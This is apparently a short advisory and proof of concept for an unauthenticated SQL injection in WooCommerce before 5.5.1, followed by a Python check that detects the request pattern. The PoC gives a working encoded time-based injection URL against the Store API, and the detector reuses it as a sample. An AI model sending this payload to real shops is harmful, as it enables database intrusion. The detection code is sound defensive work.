WooCommerce plugin < 5.5.1 is vulnerable to an unauthenticated SQL injection.
Tested on version 5.5.0.
Fixed in 5.5.1.
https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/
https://blog.wpsec.com/woocommerce-unauthenticated-sql-injection-vulnerability-2/
POC:
Navigate to this URL:
http://REDACTEDSITE/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][taxonomy]=test%252522%252529%252520or%252520sleep%25252810%252529%252523
The sleep function will execute and the page response will be delayed for 10 seconds.
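
A detection check for this request pattern, as an added example (not code from the original post or from WooCommerce): it decodes the `taxonomy` value of `calculate_attribute_counts` until it stops changing and flags values that needed extra decoding rounds or contain characters that do not belong in a taxonomy slug. The function names, the suspicious-character set and the benign sample request are assumptions; the flagged sample is the PoC query string above.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ROUTE = "/wp-json/wc/store/products/collection-data"
PARAM = re.compile(r"^calculate_attribute_counts\[[^\]]*\]\[taxonomy\]$")
# Assumption: a taxonomy slug never needs quotes, parentheses, '#', ';' or whitespace.
SUSPICIOUS = re.compile(r"""["'()#;\s]""")

# Request target taken from the PoC above (host omitted).
POC_TARGET = (ROUTE + "?calculate_attribute_counts[0][taxonomy]="
              "test%252522%252529%252520or%252520sleep%25252810%252529%252523")
# Constructed benign request for comparison.
BENIGN_TARGET = ROUTE + "?calculate_attribute_counts[0][taxonomy]=pa_color"


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing; return (decoded, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_request(target):
    """Return one finding per suspicious taxonomy value in a request target."""
    parts = urlsplit(target)
    if not parts.path.rstrip("/").endswith(ROUTE):
        return []
    findings = []
    # parse_qsl applies the single decode a web server would normally perform.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if not PARAM.match(name):
            continue
        decoded, extra_layers = fully_decode(value)
        if extra_layers > 0 or SUSPICIOUS.search(decoded):
            findings.append({"param": name, "decoded": decoded,
                             "extra_layers": extra_layers})
    return findings


if __name__ == "__main__":
    for target in (POC_TARGET, BENIGN_TARGET):
        print(inspect_request(target) or "clean", "<-", target)
```

The `extra_layers` count matters because a filter that decodes only once sees nothing but percent signs and hex digits in the PoC value.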